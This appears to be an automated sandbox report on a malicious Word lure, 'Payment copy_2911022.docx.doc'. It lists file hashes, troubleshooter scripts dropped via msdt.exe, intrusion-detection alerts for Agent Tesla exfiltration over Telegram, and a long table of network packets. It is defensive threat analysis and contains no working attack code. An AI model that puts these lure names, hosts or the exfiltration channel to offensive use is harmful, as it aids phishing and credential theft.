SHA-256:	456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
SHA-512:	422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fucker script.exe, Detection: malicious, Browse Filename: v4nkfHg4d9.doc, Detection: malicious, Browse Filename: Bewerbung.docx, Detection: malicious, Browse Filename: nnxPt0Yydv.doc, Detection: malicious, Browse Filename: qoIZSkdejM.docx, Detection: malicious, Browse Filename: icRTA4gcSe.docx, Detection: malicious, Browse Filename: order.docx, Detection: malicious, Browse Filename: Court Fine.doc, Detection: malicious, Browse Filename: 20220714 DWG.doc, Detection: malicious, Browse Filename: purchase order.xlsx, Detection: malicious, Browse Filename: WF0SlQWKr1.docx, Detection: malicious, Browse Filename: V3g2Pfu707.docx, Detection: malicious, Browse Filename: 5YMh6S8QVr.docx, Detection: malicious, Browse Filename: ZDhoKQk8G6.docx, Detection: malicious, Browse Filename: TranQuangDai.docx, Detection: malicious, Browse Filename: doc782.docx, Detection: malicious, Browse Filename: 68101181_048154.img, Detection: malicious, Browse Filename: doc782.docx, Detection: malicious, Browse Filename: doc1712.docx, Detection: malicious, Browse Filename: R346ltaP9w.rtf, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\RS_ProgramCompatibilityWizard.ps1

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	50242
Entropy (8bit):	4.932919499511673
Encrypted:	false
SSDEEP:	384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
MD5:	EDF1259CD24332F49B86454BA6F01EAB
SHA1:	7F5AA05727B89955B692014C2000ED516F65D81E
SHA-256:	AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
SHA-512:	A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\TS_ProgramCompatibilityWizard.ps1

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	16946
Entropy (8bit):	4.860026903688885
Encrypted:	false
SSDEEP:	384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
MD5:	2C245DE268793272C235165679BF2A22
SHA1:	5F31F80468F992B84E491C9AC752F7AC286E3175
SHA-256:	4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
SHA-512:	AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\VF_ProgramCompatibilityWizard.ps1

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	453
Entropy (8bit):	4.983419443697541
Encrypted:	false
SSDEEP:	12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
MD5:	60A20CE28D05E3F9703899DF58F17C07
SHA1:	98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
SHA-256:	B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
SHA-512:	2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
Malicious:	false
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\CL_LocalizationData.psd1

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6650
Entropy (8bit):	3.6751460885012333
Encrypted:	false
SSDEEP:	96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
MD5:	E877AD0545EB0ABA64ED80B576BB67F6
SHA1:	4D200348AD4CA28B5EFED544D38F4EC35BFB1204
SHA-256:	8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
SHA-512:	6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
Malicious:	false
Preview:	..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.mui

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	3.517898352371806
Encrypted:	false
SSDEEP:	96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
MD5:	CC3C335D4BBA3D39E46A555473DBF0B8
SHA1:	92ADCDF1210D0115DB93D6385CFD109301DEAA96
SHA-256:	330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
SHA-512:	49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\result\results.xsl

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	48956
Entropy (8bit):	5.103589775370961
Encrypted:	false
SSDEEP:	768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
MD5:	310E1DA2344BA6CA96666FB639840EA9
SHA1:	E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
SHA-256:	67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
SHA-512:	62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
Malicious:	false
Preview:	<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ******** Images ******** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.994989792624349
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	Payment copy_2911022.docx.doc
File size:	110504
MD5:	cd3dbd5f1d468da826581361b619b393
SHA1:	9d5fc2d99aec7c8c18d8af7267b4a31801fda770
SHA256:	1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
SHA512:	91ae486d3b8a687ce2e994ee179161896f71f6c0e973b1ebd52ff856753ccc8cb5b7e0c7890c87158a558e74e061281d4bf6dd37e9941b3593a3ccbd77f71bdf
SSDEEP:	1536:oI2CqvURAICmRMMlzJEGEBwNQFgbLndOxR8qn7CJcsqKqLzDOfFGpt+rlTuq:vTADANPLNQUkRhnm9qKqqgt+r0q
TLSH:	56B3021A16401374FBCF83FCF954890FD85B2974EB05BE441E9CEEE8A4AD3411D2D669
File Content Preview:	PK........h..U...p`...T.......[Content_Types].xmlUT...H..cH..cH..c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5149.154.167.220497254432851779 12/20/22-14:16:47.588535	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49725	443	192.168.2.5	149.154.167.220
192.168.2.5149.154.167.220497284432851779 12/20/22-14:16:51.990077	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49728	443	192.168.2.5	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2022 14:14:23.902723074 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:23.902792931 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:23.902899027 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:23.903954983 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:23.903983116 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:24.497242928 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:24.497373104 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:24.502197027 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:24.502238035 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:24.502774000 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:24.504811049 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:24.504839897 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:25.061393023 CET	443	49701	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:25.061783075 CET	49701	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:25.138766050 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:25.138839960 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:25.138947964 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:25.139244080 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:25.139273882 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:25.759648085 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:25.760251045 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:25.760283947 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:25.761534929 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:25.761550903 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:26.362339973 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:26.362500906 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:26.362571001 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:26.362623930 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:26.362651110 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:26.362651110 CET	49702	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:26.362664938 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:26.362673998 CET	443	49702	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:29.411562920 CET	49703	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:29.411624908 CET	443	49703	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:29.411721945 CET	49703	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:29.412061930 CET	49703	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:29.412079096 CET	443	49703	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:29.992482901 CET	443	49703	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:29.993061066 CET	49703	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:29.993089914 CET	443	49703	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:29.994359970 CET	49703	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:29.994369984 CET	443	49703	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:30.570672989 CET	443	49703	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:30.571005106 CET	49703	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:30.639374018 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:30.639475107 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:30.639561892 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:30.640628099 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:30.640664101 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.260385990 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.260526896 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.282834053 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.282875061 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.283493996 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.283627987 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.284497023 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.284504890 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.872313976 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.872378111 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.872479916 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.872508049 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.872541904 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.881751060 CET	49704	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.881778002 CET	443	49704	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.952964067 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.953025103 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:31.953118086 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.953443050 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:31.953459978 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:32.528594017 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:32.528748989 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:32.531790018 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:32.531805038 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:32.538316965 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:32.538341045 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.099616051 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.099706888 CET	443	49705	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.099796057 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.100476980 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.100476980 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.102312088 CET	49705	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.299954891 CET	49706	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.300024986 CET	443	49706	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.300117016 CET	49706	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.300584078 CET	49706	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.300625086 CET	443	49706	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.883405924 CET	443	49706	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.887769938 CET	49706	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.887825966 CET	443	49706	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:33.889586926 CET	49706	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:33.889611959 CET	443	49706	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:34.463419914 CET	443	49706	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:34.501749039 CET	49706	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:34.536781073 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:34.536851883 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:34.536952019 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:34.537168026 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:34.537183046 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.120482922 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.164689064 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.171235085 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.171258926 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.172949076 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.172960043 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.699229956 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.699325085 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.699393034 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.699443102 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.699443102 CET	49707	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.699462891 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.699482918 CET	443	49707	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.714086056 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.714178085 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:35.714272976 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.714438915 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:35.714458942 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.294075012 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.336673975 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.578892946 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.578948021 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.580969095 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.581005096 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.873651981 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.873954058 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.873994112 CET	443	49708	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.874064922 CET	49708	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.914984941 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.915045023 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:36.915138960 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.915414095 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:36.915431976 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:37.492472887 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:37.492610931 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:37.492968082 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:37.492979050 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:37.495839119 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:37.495856047 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.067431927 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.067565918 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.067574024 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.067629099 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.067750931 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.067775965 CET	443	49709	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.067790031 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.067830086 CET	49709	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.144233942 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.144294024 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.144419909 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.144813061 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.144830942 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.729048967 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.729156017 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.729666948 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.729688883 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:38.733906031 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:38.733928919 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.305809975 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.305913925 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.306024075 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.306091070 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.306111097 CET	443	49710	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.306126118 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.306159973 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.306185007 CET	49710	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.323591948 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.323646069 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.323741913 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.324110031 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.324131966 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.946089029 CET	443	49711	118.27.125.229	192.168.2.5
